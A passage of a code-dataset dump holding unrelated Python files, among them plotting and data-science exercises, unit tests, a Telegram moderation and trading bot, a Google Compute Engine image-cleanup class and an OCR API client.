Add a title to the histogram: Histogram of nums against bins.\n\nimport numpy\nimport matplotlib.pyplot as plt\n\n# CREATE THE NUMPY ARRAYS\nnums = numpy.array([0.5, 0.7, 1.0, 1.2, 1.3, 2.1])\nbins = numpy.array([0, 1, 2, 3])\n\n# PRINT THE DETAILS\nprint(\"nums: \", nums)\nprint(\"bins: \", bins)\nprint(\"Result:\", numpy.histogram(nums, bins))\n\n# ADD THE TITLE\nplt.title(\"Histogram of nums against bins.\")\n# ADD THE X-AXIS LABEL\nplt.xlabel(\"nums\")\n# ADD THE Y-AXIS LABEL\nplt.ylabel(\"bins\")\n# PLOT THE GRAPH WITH THE VALUES\nplt.hist(nums, bins=bins)\n# SHOW THE GRAPH\nplt.show()","sub_path":"challenge_2.py","file_name":"challenge_2.py","file_ext":"py","file_size_in_byte":717,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} {"seq_id":"567046745","text":"from proj5_code.image_loader import ImageLoader\nfrom proj5_code.data_transforms import get_fundamental_transforms\nfrom pathlib import Path\n\nimport numpy as np\nimport torch\n\nPROJ_ROOT = Path(__file__).resolve().parent.parent\n\n\ndef test_dataset_length():\n    train_image_loader = ImageLoader(\n        root_dir=f\"{PROJ_ROOT}/data/\",\n        split=\"train\",\n        transform=get_fundamental_transforms(inp_size=(64, 64)),\n    )\n\n    test_image_loader = ImageLoader(\n        root_dir=f\"{PROJ_ROOT}/data/\",\n        split=\"test\",\n        transform=get_fundamental_transforms(inp_size=(64, 64)),\n    )\n\n    assert train_image_loader.__len__() == 2985\n    assert test_image_loader.__len__() == 1500\n\n\ndef test_unique_vals():\n    train_image_loader = ImageLoader(\n        root_dir=f\"{PROJ_ROOT}/data/\",\n        split=\"train\",\n        transform=get_fundamental_transforms(inp_size=(64, 64)),\n    )\n\n    item1 = train_image_loader.__getitem__(10)\n    item2 = train_image_loader.__getitem__(25)\n\n    assert not torch.allclose(item1[0], item2[0])\n\n\ndef test_class_values():\n    \"\"\" \"\"\"\n    test_image_loader = ImageLoader(\n        root_dir=f\"{PROJ_ROOT}/data/\",\n        split=\"test\",\n        transform=get_fundamental_transforms(inp_size=(64, 64)),\n    )\n\n    class_labels = test_image_loader.class_dict\n    class_labels = {ele.lower(): class_labels[ele] for ele in class_labels}\n    \n    # should be 15 unique keys and 15 unique values in the dictionary\n    assert len(set(class_labels.values())) == 15\n    assert len(set(class_labels.keys())) == 15\n    \n    # indices must be ordered from [0,14] only\n    assert set(list(range(15))) == set(class_labels.values())\n    \n    # must be ordered alphabetically\n    assert class_labels['industrial'] == 4\n    assert class_labels['suburb'] == 13\n\n\ndef test_load_img_from_path():\n    test_image_loader = ImageLoader(\n        root_dir=f\"{PROJ_ROOT}/data/\",\n        split=\"train\",\n        transform=get_fundamental_transforms(inp_size=(64, 64)),\n    )\n    im_path = f\"{PROJ_ROOT}/data/train/bedroom/image_0003.jpg\"\n\n    im_np = np.asarray(test_image_loader.load_img_from_path(im_path))\n\n    expected_data = np.loadtxt(f\"{PROJ_ROOT}/proj5_unit_tests/data/sample_inp.txt\")\n\n    assert np.allclose(expected_data, im_np)\n\n\nif __name__ == \"__main__\":\n    test_load_img_from_path()\n","sub_path":"proj5/proj5_unit_tests/test_image_loader.py","file_name":"test_image_loader.py","file_ext":"py","file_size_in_byte":2303,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} {"seq_id":"457072242","text":"from flask import Flask\n\napp = Flask(__name__)\ncount = 0\n\n@app.route('/dave')\ndef hello_world():\n    global count\n    count += 1\n    return 'Hello, World ... 
Hello Dave {}'.format(count)\n\nif __name__ == '__main__':\n app.run()","sub_path":"FlaskApps/flaskapp1.py","file_name":"flaskapp1.py","file_ext":"py","file_size_in_byte":228,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"293243936","text":"import logging\nimport shlex\n\nfrom art.rhevm_api.tests_lib.low_level import (\n networks as ll_networks,\n hosts as ll_hosts\n)\nimport rhevmtests.helpers as global_helper\n\nlogger = logging.getLogger(\"Bad_Bond_Helper\")\n\n\ndef check_mac_address(mac_address, positive):\n \"\"\"\n Check if given MAC address is zero or not\n\n Args:\n mac_address (str): MAC address\n positive (bool): True to check for valid bond address (non-zero), False\n to check for invalid bond address (zero)\n\n Returns:\n bool: True if MAC address is not zero or zero, according to the no_zero\n argument, False otherwise\n\n \"\"\"\n zero_mac = \"00:00:00:00:00:00\"\n return mac_address != zero_mac if positive else mac_address == zero_mac\n\n\ndef get_bond_ad_partner_mac_in_linux(host_name, bond_name):\n \"\"\"\n Get LACP bond (mode-4) ad_partner_mac MAC value in Linux\n\n Args:\n host_name (str): Host name\n bond_name (str): Bond name\n\n Returns:\n bool: True if get was successful, False otherwise\n\n \"\"\"\n logger.info(\n \"Checking if ad_partner_mac value is reported in Linux on bond: %s\",\n bond_name\n )\n cmd = \"cat /sys/class/net/%s/bonding/ad_partner_mac\" % bond_name\n host_rsc = global_helper.get_host_resource_by_name(host_name=host_name)\n rc, os_out, _ = host_rsc.run_command(shlex.split(cmd))\n if rc or not os_out:\n logger.error(\n \"Linux not reported ad_partner_mac value on bond: %s\", bond_name\n )\n return False\n\n logger.info(\"Linux reported ad_partner_mac value: %s\", os_out.strip())\n return True\n\n\ndef check_bond_ad_partner_mac_in_vds_client(host_name, bond_name):\n \"\"\"\n Check if LACP bond (mode-4) ad_partner_mac value is reported by VDS client\n\n Args:\n host_name (str): Host name\n bond_name (str): Bond name\n\n Returns:\n str: MAC address, or empty string if not reported, or error has\n occurred\n\n \"\"\"\n logger.info(\n \"Checking if ad_partner_mac value is reported in vdsClient on bond:\"\n \" %s\", bond_name\n )\n host_rsc = global_helper.get_host_resource_by_name(host_name=host_name)\n cmd_out = host_rsc.vds_client(cmd=\"Host.getCapabilities\")\n if not cmd_out:\n logger.error(\n \"vdsClient getVdsCapabilities returned empty response on host: %s\",\n host_name\n )\n return \"\"\n\n cmd_out = cmd_out.get(\"bondings\", dict()).get(bond_name, dict()).get(\n \"ad_partner_mac\"\n )\n\n if not cmd_out:\n logger.error(\n \"vdsClient not reported ad_partner_mac value on bond: %s\",\n bond_name\n )\n return \"\"\n\n logger.info(\"vdsClient reported ad_partner_mac value: %s\", cmd_out)\n return cmd_out\n\n\ndef check_bond_ad_partner_mac_in_rest(host_name, bond_name):\n \"\"\"\n Check if LACP bond (mode-4) ad_partner_mac value is reported by REST\n\n Args:\n host_name (str): Host name\n bond_name (str): Bond name\n\n Returns:\n str: MAC address, or empty string if not reported, or error has\n occurred\n \"\"\"\n host_obj = ll_hosts.get_host_object(host_name=host_name)\n mac = ll_networks.get_bond_bonding_property(\n host=host_obj, bond=bond_name, property_name=\"ad_partner_mac\"\n )\n if not mac:\n logger.error(\n \"REST not reported ad_partner_mac value on bond: %s\",\n bond_name\n )\n return \"\"\n\n logger.info(\"REST reported ad_partner_mac value: %s\", mac.address)\n return 
mac.address\n","sub_path":"art/tests/rhevmtests/networking/bad_bond/helper.py","file_name":"helper.py","file_ext":"py","file_size_in_byte":3544,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} {"seq_id":"266537565","text":"\"\"\"Add slate information dynamically.\"\"\"\n\nfrom datetime import datetime\nimport os\n\nfrom photoshop import Session\n\nfile_path = os.path.join(os.path.dirname(__file__), \"slate_template.psd\")\n\nwith Session(file_path, action=\"open\", auto_close=True) as ps:\n    layer_set = ps.active_document.layerSets.getByName(\"template\")\n    data = {\n        \"project name\": \"test_project\",\n        \"datetime\": datetime.today().strftime('%Y-%m-%d')\n    }\n    for layer in layer_set.layers:\n        if layer.kind == \"TextLayer\":\n            layer.textItem.contents = data[layer.textItem.contents.strip()]\n\n    jpg_file = \"d:/photoshop_slate.jpg\"\n    ps.active_document.saveAs(jpg_file, ps.JPEGSaveOptions())\n    os.startfile(jpg_file)\n","sub_path":"examples/photoshop_session.py","file_name":"photoshop_session.py","file_ext":"py","file_size_in_byte":717,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} {"seq_id":"80931114","text":"import pandas as pd\n\ndef cal_increase(data, outfile):\n\n    \"\"\"Calculate the increase value and return the calculated table for all stocks\n    \n    formula:\n    increase = (the last value - the first value) / the first value * 100\n\n    conditions:\n    - data columns: ['Name', 'Date', 'notes', 'Value', 'Change']\n    - data must be cleaned (without any missing values such as Null, UNKNOWN, NA)\n    - data['Date'] must be converted to be the type 'datetime' by `pd.to_datetime()`\n    \"\"\"\n\n    # the records of the first date\n    first_dates = data.sort_values(by=['Date']).drop_duplicates(subset='Name', keep='first')\n    # the records of the last date\n    last_dates = data.sort_values(by=['Date']).drop_duplicates(subset='Name', keep='last')\n    # merge the records by 'Stock Name' with first_date_records and last_date_records\n    final_data = pd.merge(first_dates, last_dates, on='Name')\n\n    # calculate the increased values\n    # increase = (the value of the last date - the value of the first date) / the value of the first date * 100\n    final_data['increased'] = (final_data['Value_y'].astype(float) - final_data['Value_x'].astype(float)) / final_data['Value_x'].astype(float) * 100\n\n    # rename the columns\n    final_data.rename(columns={'Date_x': 'Date_first', \\\n                               'notes_x': 'notes_first', \\\n                               'Value_x': 'Value_first', \\\n                               'Change_x': 'Change_first', \\\n                               'Date_y': 'Date_last', \\\n                               'notes_y': 'notes_last', \\\n                               'Value_y': 'Value_last', \\\n                               'Change_y': 'Change_last'}, inplace=True)\n\n    # output the results\n    final_data.sort_values(by=['increased'], ascending=False).to_csv(outfile)\n","sub_path":"python/stock_insights/insights/increase.py","file_name":"increase.py","file_ext":"py","file_size_in_byte":1833,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} {"seq_id":"154811509","text":"def main():\n    cakes.sort()\n    cakes.sort(key=lambda x: str(x)[-1])\n\n    answer = 0\n    chance = m\n\n    for cake in cakes:\n        if cake == 10:\n            answer += 1\n        elif cake > 10 and chance > 0:\n            div, mod = divmod(cake, 10)\n\n            if mod == 0:\n                cnt = min(div - 1, chance)\n\n                if chance >= div - 1:\n                    answer += 1\n            else:\n                cnt = min(div, chance)\n\n            chance -= cnt\n            answer += cnt\n\n    print(answer)\n\n\nif __name__ == \"__main__\":\n    n, m = map(int, input().split())\n    cakes = list(map(int, input().split()))\n\n    
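# Note on the greedy in main() above (a reading of the code, not a proof): the\n    # two sorts put cake lengths ending in 0 first; a cake whose length is an\n    # exact multiple 10*k yields k sellable pieces from only k - 1 cuts, while\n    # any other length costs one cut per 10-piece, so the cut budget `chance`\n    # appears to be spent on the cheapest pieces first.\n    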
main()\n","sub_path":"0816~0817/16206 롤케이크.py","file_name":"16206 롤케이크.py","file_ext":"py","file_size_in_byte":642,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"366365047","text":"# 判断是否符合球队\ndef fun(sex,age):\n if(sex == 'f') and (age in ['10','11','12']):\n print('可以加入球队')\n return 1\n else:\n print(\"不可以加入球队\")\n return 0\n#计数,满足要求的人数\nnum = 0\nfor i in range(10):\n sex = input('请输入性别:')\n age = input('请输入年龄:')\n # 调用函数实现判断\n num += fun(sex,age)\n\nprint('满足条件的总人数',num)","sub_path":"Test/WeekOne/Demo3.py","file_name":"Demo3.py","file_ext":"py","file_size_in_byte":440,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"255622744","text":"# 124. Binary Tree Maximum Path Sum\n# https://leetcode.com/problems/binary-tree-maximum-path-sum/\n\n# -----------------------------------------------------------\nimport sys\n\n# Definition for a binary tree node.\n\n\nclass TreeNode:\n def __init__(self, val=0, left=None, right=None):\n self.val = val\n self.left = left\n self.right = right\n\n\nclass Solution:\n # def __init__(self) -> None:\n # self.ans = -sys.maxsize\n\n def oneSideMaxWithRoot(self, root: TreeNode) -> int:\n \"\"\"\n max path sum that must includes root node\n :param root:\n :return:\n \"\"\"\n if root is None:\n return -sys.maxsize\n left = max(0, self.oneSideMaxWithRoot(root.left))\n right = max(0, self.oneSideMaxWithRoot(root.right))\n # calculate and update the ans, when calculating oneSideMaxWithRoot.\n self.ans = max(self.ans, left + right + root.val)\n return root.val + max(left, right)\n\n def maxPathSum(self, root: TreeNode) -> int:\n \"\"\"\n max path sum that may or may not include root node\n :param root:\n :return:\n \"\"\"\n if root is None:\n return 0\n self.ans = -sys.maxsize\n self.oneSideMaxWithRoot(root)\n return self.ans\n# -----------------------------------------------------------\n# https://www.youtube.com/watch?v=9ZNky1wqNUw&ab_channel=HuaHua\n# https://www.acwing.com/file_system/file/content/whole/index/content/1753710/\n","sub_path":"0124-Binary-Tree-Maximum-Path-Sum/124.py","file_name":"124.py","file_ext":"py","file_size_in_byte":1482,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"7066837","text":"#Herald\nimport telebot\nimport config\nimport db\nfrom otrh import function as otrh_f\nfrom otrh import names\nfrom otrh import game_config as gcfg\nfrom otrh import equip\nimport traceback\nfrom telebot import apihelper\nfrom telebot import types\n\nAPI_TOKEN = config.herald_token\nbot = telebot.TeleBot(API_TOKEN, threaded = True)\n\n\n@bot.channel_post_handler(func=lambda message: True)\ndef post_handler(post):\n\t_main_chat = '-1001270742403'\n\tbot.forward_message(_main_chat, post.chat.id, post.message_id)\n\n\n@bot.callback_query_handler(func=lambda call: True)\ndef callback_inline(call):\n\n _data = call.data.split('_')\n if bot.get_chat_member(_data[1], call.from_user.id).status not in ['creator', 'administrator']:\n bot.answer_callback_query(callback_query_id=call.id, show_alert=True, text=\"Не админ, не жми!\")\n if _data[0] == 'yes':\n bot.restrict_chat_member(_data[1], _data[2], _data[3], False)\n bot.delete_message(_data[1], call.message.message_id)\n bot.answer_callback_query(callback_query_id=call.id, show_alert=True, text=\"Я верю что бан был обоснован.\")\n else:\n bot.delete_message(_data[1], call.message.message_id)\n bot.answer_callback_query(callback_query_id=call.id, 
show_alert=True, text=\"Миссклик? Ну и ладно, без бана тоже хорошо\")\n\n if call.data.startswith('buy_'):\n if str(call.from_user.id) == _data[1]:\n bot.answer_callback_query(callback_query_id=call.id, show_alert=True, text=\"Ты не можешь купить сам у себя!\")\n elif call.chat_instance != '-1848070246900715408':\n bot.answer_callback_query(callback_query_id=call.id, show_alert=True, text=\"Торговля в данном чате запрещена!\")\n bot.edit_message_text(inline_message_id=call.inline_message_id, text=\"Торговля в данном чате запрещена!\")\n else:\n if db.get_user_inventory(_data[1])[_data[2]] < 1:\n bot.edit_message_text(inline_message_id=call.inline_message_id, text=\"У игрока закончился данный предмет.\")\n elif db.get_hero(call.from_user.id)['gold'] >= int(_data[3]):\n db.add_inventory(call.from_user.id, _data[2], 1)\n db.add_inventory(_data[1], _data[2], -1)\n db.add_gold(call.from_user.id, -int(_data[3]))\n db.add_gold(_data[1], int(_data[3]))\n bot.answer_callback_query(callback_query_id=call.id, show_alert=False, text=\"Ты приобрел данный предмет!\")\n\n\n\n_ref_text = 'Привет путник 🧙‍♂️, кажется ты что-то слышал в кустах🌳, скорее жми /catch и отправься в невероятное приключение по миру RogTor✨ в котором ты найдёшь много приятных собеседников👨‍💻, опробуешь уникальную механику игры🎮и наконец-то поймёшь, что значит быть задротом🕑\\nПодними свой меч во имя короля! 👑\\n\\nТебя тут ждут,жми! \\nНачать игру!'\n\n@bot.inline_handler(func=lambda query: True)\ndef query_text(query):\n results = []\n i = 2\n test = types.InlineQueryResultArticle(id='1', title=\"Пригласить друга в игру.\",description=\"Кидает рекламный текст, с вашей реф.ссылкой\",input_message_content=types.InputTextMessageContent(message_text=_ref_text.format(query.from_user.id, query.from_user.id), parse_mode='Html', disable_web_page_preview=True))\n results.append(test)\n\n black_list_item = ['user_id', 'logic', 'lost_cargo', 'blacksmithtools']\n\n if len(query.query.split(' ')) == 2 and query.query.split(' ')[0] in names.item and query.query.split(' ')[0] not in black_list_item and int(db.get_user_inventory(query.from_user.id)[query.query.split(' ')[0]]) > 0:\n try:\n _store = db.get_user_inventory(query.from_user.id)\n if int(query.query.split(' ')[1]) == round(int(query.query.split(' ')[1])) and int(query.query.split(' ')[1]) > 0 and int(query.query.split(' ')[1]) < 1001 and not (query.query.split(' ')[1].startswith('0') or query.query.split(' ')[1].startswith('+')):\n _buy_text = 'Купить у {nick}'.format(**db.get_hero(query.from_user.id))\n _buy_text += '\\n{} за {}💰'.format(names.item[query.query.split(' ')[0]], query.query.split(' ')[1])\n kb = types.InlineKeyboardMarkup()\n _callback = 'buy_{}_{}_{}'.format(query.from_user.id, query.query.split(' ')[0], query.query.split(' ')[1])\n kb.add(types.InlineKeyboardButton(text=\"💰Купить\", callback_data=_callback))\n single_msg = types.InlineQueryResultArticle(\n id=\"2\", title=\"💰Продать {} за {}\".format(names.item[query.query.split(' ')[0]], query.query.split(' ')[1]),\n input_message_content=types.InputTextMessageContent(message_text=_buy_text),\n reply_markup=kb)\n results.append(single_msg)\n except Exception as e:\n print(e)\n pass\n bot.answer_inline_query(query.id, results, cache_time=1)\n\n\n_admin = '439637823'\ndef listener3(messages):\n for m in messages:\n try:\n\n if str(m.chat.id) == '-1001434073497':\n if m.content_type != 'text' or 'Купить у' not in m.text:\n bot.delete_message(m.chat.id, m.message_id)\n bot.restrict_chat_member(m.chat.id, m.from_user.id, 
int(m.date) + (30 * 60), False)\n                    return\n\n            if m.content_type != 'text':\n                return\n\n            if m.text.lower().startswith('/ro') and 'reply_to_message' in m.json and bot.get_chat_member(m.chat.id, m.from_user.id).status in ['creator', 'administrator']:\n                _data = m.text.split(' ')\n                _data = [x for x in _data if x]\n                try:\n                    _data[1] = int(_data[1])\n                    text = 'Give this user read-only (RO) for {} minutes?'.format(_data[1])\n                    _data[1] = int(_data[1]) * 60\n                    _timess = int(m.date) + _data[1]\n                except:\n                    _timess = 666\n                    text = 'Give this user read-only (RO) forever?'\n                markup = telebot.types.InlineKeyboardMarkup()\n                markup.row_width = 1\n                _callback = '_{}_{}_{}'.format(m.chat.id, m.json['reply_to_message']['from']['id'], _timess)\n                markup.add(telebot.types.InlineKeyboardButton(\"Ban\", callback_data=\"yes\" + _callback), telebot.types.InlineKeyboardButton(\"Cancel\", callback_data=\"no\" + _callback))\n                bot.send_message(m.chat.id, text=text, reply_to_message_id=m.reply_to_message.message_id, reply_markup=markup, parse_mode='Html')\n                bot.delete_message(m.chat.id, m.message_id)\n                return\n            else:\n                pass\n\n            if m.text == '!id' and str(m.from_user.id) == '439637823':\n                bot.delete_message(m.chat.id, m.message_id)\n                bot.send_message(439637823, str(m.chat.id))\n                return\n\n        except Exception:\n            bot.send_message(439637823, str(traceback.format_exc()))\n            #print(m)\n\nbot.set_update_listener(listener3)\n\n\nbot.polling()","sub_path":"RPG/herald.py","file_name":"herald.py","file_ext":"py","file_size_in_byte":7670,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} {"seq_id":"576772032","text":"\"\"\"\nContains BSD Radius server version info\n\"\"\"\n\n# HeadURL\t\t$HeadURL: file:///Z:/backup/svn/webstuff/tags/release20061229_v_1_0_0/webstuff/webstuff_version.py $\n# Author:\t\t$Author: valts $\n# File version:\t$Revision: 9 $\n# Last changes:\t$Date: 2006-03-31 19:26:39 +0300 (Pk, 31 Mar 2006) $\n\n\nmajor = 0\nminor = 1\ndebug = 0\n\nfullVersion = '%s.%s.%s' % (major, minor, debug)\n","sub_path":"bsdradius/webstuff/webstuff_version.py","file_name":"webstuff_version.py","file_ext":"py","file_size_in_byte":371,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} {"seq_id":"647148826","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom sklearn.cluster import KMeans\nfrom sklearn.metrics import pairwise_distances_argmin\nfrom sklearn.utils import shuffle\nfrom PIL import Image\n\nn_colors = 32\n\n# Load the raccoon image\nwaschbar = Image.open(\"waschbar.jpg\")\n\n# Convert to floats and then divide by 255 so that imshow will work on it\n# (The values have to be in range [0,1])\nwaschbar = np.array(waschbar, dtype=np.float64) / 255\n\n# Transform image to a 2D array\nw, h, d = original_shape = tuple(waschbar.shape)\nassert d == 3\nimage_array = np.reshape(waschbar, (w * h, d))\n\n# Fitting the model on a small subsample of the data\nimage_array_sample = shuffle(image_array, random_state=0)[:1000]\nkmeans = KMeans(n_clusters=n_colors, random_state=0).fit(image_array_sample)\n\n# Predicting color indices on the full image using k-means\nlabels = kmeans.predict(image_array)\n\n# Predicting color indices on the full image randomly\nrandom = shuffle(image_array, random_state=0)[:n_colors + 1]\nlabels_random = pairwise_distances_argmin(random, image_array, axis=0)\n\n\n# Recreate image of a certain size using the codebook and the labels\ndef recreate_image(codebook, labels, w, h):\n    d = codebook.shape[1]\n    image = np.zeros((w, h, d))\n    label_idx = 0\n    for i in range(w):\n        for j in range(h):\n            image[i][j] = codebook[labels[label_idx]]\n            label_idx += 1\n    return image\n
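\n# A vectorized alternative (a sketch; the script itself keeps the loop above):\n# numpy fancy indexing gathers one codebook row per label in a single step,\n# replacing the Python-level double loop.\ndef recreate_image_fast(codebook, labels, w, h):\n    # codebook: (n_colors, d); labels: (w * h,) integer indices.\n    # codebook[labels] -> (w * h, d), reshaped back to (w, h, d).\n    return codebook[labels].reshape(w, h, -1)\n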
\n# Display all results, alongside original image\nplt.figure(1)\nplt.clf()\nax = plt.axes([0, 0, 1, 1])\nplt.axis('off')\nplt.title('Original image (96,615 colors)')\nplt.imshow(waschbar)\n\nplt.figure(2)\nplt.clf()\nax = plt.axes([0, 0, 1, 1])\nplt.axis('off')\nplt.title('Quantized image (32 colors, K-Means)')\nplt.imshow(recreate_image(kmeans.cluster_centers_, labels, w, h))\n\nplt.figure(3)\nplt.clf()\nax = plt.axes([0, 0, 1, 1])\nplt.axis('off')\nplt.title('Quantized image (32 colors, Random)')\nplt.imshow(recreate_image(random, labels_random, w, h))\nplt.show()\n","sub_path":"myexample.py","file_name":"myexample.py","file_ext":"py","file_size_in_byte":1960,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} {"seq_id":"5973045","text":"import sqlite3\n\nconn = sqlite3.connect('demo.db')\ncursor = conn.cursor()\n# query the table's column meta-info\ncursor.execute('PRAGMA TABLE_INFO(\"Lotto\")')\n#print(cursor.fetchall())\nnames =[t[1] for t in cursor.fetchall()]\n#print(names)\nfor name in names:\n    print(name,end='\\\t')\nprint('\\\n---------------------------------')\n# query the data rows via SQL\nsql = 'SELECT id,n1,n2,n3,n4,n5,ts FROM lotto'\ncursor.execute(sql)\nrows = cursor.fetchall()\n#print(rows)\n\nfor r in rows:\n    print('{}\\\t{}\\\t{}\\\t{}\\\t{}\\\t{}\\\t{}\\\t'\n          .format(r[0],r[1],r[2],r[3],r[4],r[5],r[6]))\n\ncursor.close()\n","sub_path":"case03/Select_1.py","file_name":"Select_1.py","file_ext":"py","file_size_in_byte":565,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} {"seq_id":"603078208","text":"from .vault import GCECredential\nfrom .provider import Provider, Image\nimport googleapiclient.discovery\nfrom google.oauth2 import service_account\nfrom dateutil.parser import parse\nimport re\n\n\n\nclass GCE(Provider):\n    __instances = dict()\n\n    def __new__(cls, vault_namespace):\n        if vault_namespace not in GCE.__instances:\n            GCE.__instances[vault_namespace] = self = object.__new__(cls)\n            self.__credentials = GCECredential(vault_namespace)\n            self.__compute_client = None\n            self.__project = None\n        return GCE.__instances[vault_namespace]\n\n    def compute_client(self):\n        if self.__credentials.isExpired():\n            self.__credentials.renew()\n            self.__compute_client = None\n        self.__project = self.__credentials.getPrivateKeyData()['project_id']\n        if(self.__compute_client is None):\n            credentials = service_account.Credentials.from_service_account_info(self.__credentials.getPrivateKeyData())\n            self.__compute_client = googleapiclient.discovery.build('compute', 'v1', credentials=credentials,\n                                                                    cache_discovery=False)\n        return self.__compute_client\n\n    def list_instances(self, zone):\n        ''' List all instances by zone.'''\n        result = []\n        request = self.compute_client().instances().list(project=self.__project, zone=zone)\n        while request is not None:\n            response = request.execute()\n            if 'items' in response:\n                result += response['items']\n            request = self.compute_client().instances().list_next(previous_request=request, previous_response=response)\n        return result\n\n    def list_all_instances(self):\n        result = []\n        for region in self.list_regions():\n            for zone in self.list_zones(region):\n                result += self.list_instances(zone=zone)\n        return result\n\n    def list_regions(self):\n        '''Walk through all regions and collect their names into a list.\n        @see https://cloud.google.com/compute/docs/reference/rest/v1/instances/list#examples'''\n        result = 
[]\n request = self.compute_client().regions().list(project=self.__project)\n while request is not None:\n response = request.execute()\n\n for region in response['items']:\n result.append(region['name'])\n request = self.compute_client().regions().list_next(previous_request=request, previous_response=response)\n return result\n\n def list_zones(self, region):\n region = self.compute_client().regions().get(project=self.__project, region=region).execute()\n return [GCE.url_to_name(z) for z in region['zones']]\n\n def delete_instance(self, instance_id, zone):\n if self.dry_run:\n self.log_info(\"Deletion of instance {} skipped due to dry run mode\", instance_id)\n else:\n self.compute_client().instances().delete(project=self.__project, zone=zone, instance=instance_id).execute()\n\n @staticmethod\n def url_to_name(url):\n return url[url.rindex('/')+1:]\n\n def parse_image_name(self, img_name):\n regexes = [\n # sles12-sp5-gce-x8664-0-9-1-byos-build1-56\n re.compile(r'''^sles\n (?P\\d+(-sp\\d+)?)\n -\n (?Pgce)\n -\n (?P[^-]+)\n -\n (?P\\d+-\\d+-\\d+)\n -\n (?P(byos|on-demand))\n -build\n (?P\\d+-\\d+)\n ''', re.RegexFlag.X),\n # sles15-sp2-byos-x8664-0-9-3-gce-build1-10\n # sles15-sp2-x8664-0-9-3-gce-build1-10\n re.compile(r'''^sles\n (?P\\d+(-sp\\d+)?)\n (-(?P[-\\w]+))?\n -\n (?P[^-]+)\n -\n (?P\\d+-\\d+-\\d+)\n -\n (?Pgce)\n -\n build\n (?P\\d+-\\d+)\n ''', re.RegexFlag.X)\n ]\n return self.parse_image_name_helper(img_name, regexes)\n\n def cleanup_all(self):\n images = list()\n request = self.compute_client().images().list(project=self.__project)\n while request is not None:\n response = request.execute()\n if 'items' not in response:\n break\n for image in response['items']:\n # creation:2019-11-04T14:23:06.372-08:00\n # name:sles12-sp5-gce-x8664-0-9-1-byos-build1-56\n m = self.parse_image_name(image['name'])\n if m:\n images.append(Image(image['name'], flavor=m['key'], build=m['build'],\n date=parse(image['creationTimestamp'])))\n self.log_dbg('Image {} is candidate for deletion with build {}', image['name'], m['build'])\n else:\n self.log_err(\"Unable to parse image name '{}'\", image['name'])\n\n request = self.compute_client().images().list_next(previous_request=request, previous_response=response)\n\n keep_images = self.get_keeping_image_names(images)\n\n for img in [i for i in images if i.name not in keep_images]:\n self.log_info(\"Delete image '{}'\", img.name)\n if self.dry_run:\n self.log_info(\"Deletion of image {} skipped due to dry run mode\", img.name)\n else:\n request = self.compute_client().images().delete(project=self.__project, image=img.name)\n response = request.execute()\n if 'error' in response:\n for e in response['error']['errors']:\n self.log_err(e['message'])\n if 'warnings' in response:\n for w in response['warnings']:\n self.log_warn(w['message'])\n","sub_path":"ocw/lib/gce.py","file_name":"gce.py","file_ext":"py","file_size_in_byte":6106,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"39398958","text":"import json\nimport requests\nfrom api.utils import get_response\nfrom api.logger import uai_logger\n\n\nclass UAIOcrBaseDatastreamApi(object):\n\n def __init__(self, cmd_url, signature, public_key, resource_id, timestamp):\n self.cmd_params = {}\n self.cmd_header = {}\n self.cmd_url = cmd_url\n self.cmd_header['Signature'] = signature\n self.cmd_header['PublicKey'] = public_key\n self.cmd_header['ResourceId'] = resource_id\n self.cmd_header['Timestamp'] = str(timestamp)\n\n def _check_args(self, header, 
params):\n if header['Signature'] == \"\":\n raise ValueError(\"Signature cannot be nil in header info\")\n if header['PublicKey'] == \"\":\n raise ValueError(\"PublicKey cannot be nil in header info\")\n if header['ResourceId'] == \"\":\n raise ValueError(\"ResourceId cannot be nil in header info\")\n if header['Timestamp'] == 0:\n raise ValueError(\"Timestamp cannot be nil in header info\")\n return True\n\n def call_api(self):\n if not self._check_args(self.cmd_header, self.cmd_params):\n raise ValueError(\"Check API params error, header: {0}, params: {1}\".\n format(self.cmd_header, self.cmd_params))\n\n def _send_post_request(self):\n r = requests.post(self.cmd_url, data=json.dumps(self.cmd_params), headers=self.cmd_header)\n rsp = json.loads(r.text, encoding='utf-8')\n if rsp['RetCode'] != 0:\n print(\"Call {0} fail: [{1}]{2}\".format(self.cmd_url, rsp[\"RetCode\"],\n rsp[\"Message\"].encode('utf-8')))\n uai_logger.error(\"Call {0} fail: [{1}]{2}\".format(self.cmd_url, rsp[\"RetCode\"],\n rsp[\"Message\"].encode('utf-8')))\n return False, rsp\n else:\n print(\"Call {0} success: {1}\".format(self.cmd_url, get_response(rsp, 0)))\n uai_logger.info(\"Call {0} success: {1}\".format(self.cmd_url, get_response(rsp, 0)))\n return True, rsp\n\n def _send_post_request_with_multi_part(self):\n # m = MultipartEncoder(fields=self.cmd_params)\n # self.cmd_header['Content-Type'] = m.content_type\n r = requests.post(self.cmd_url, files=self.cmd_params, headers=self.cmd_header)\n print (r.text)\n rsp = json.loads(r.text, encoding='utf-8')\n if rsp['RetCode'] != 0:\n print(\"Call {0} fail: [{1}]{2}\".format(self.cmd_url, rsp[\"RetCode\"],\n rsp[\"Message\"].encode('utf-8')))\n uai_logger.error(\"Call {0} fail: [{1}]{2}\".format(self.cmd_url, rsp[\"RetCode\"],\n rsp[\"Message\"].encode('utf-8')))\n return False, rsp\n else:\n print(\"Call {0} success: {1}\".format(self.cmd_url, get_response(rsp, 0)))\n uai_logger.info(\"Call {0} success: {1}\".format(self.cmd_url, get_response(rsp, 0)))\n return True, rsp\n\n def 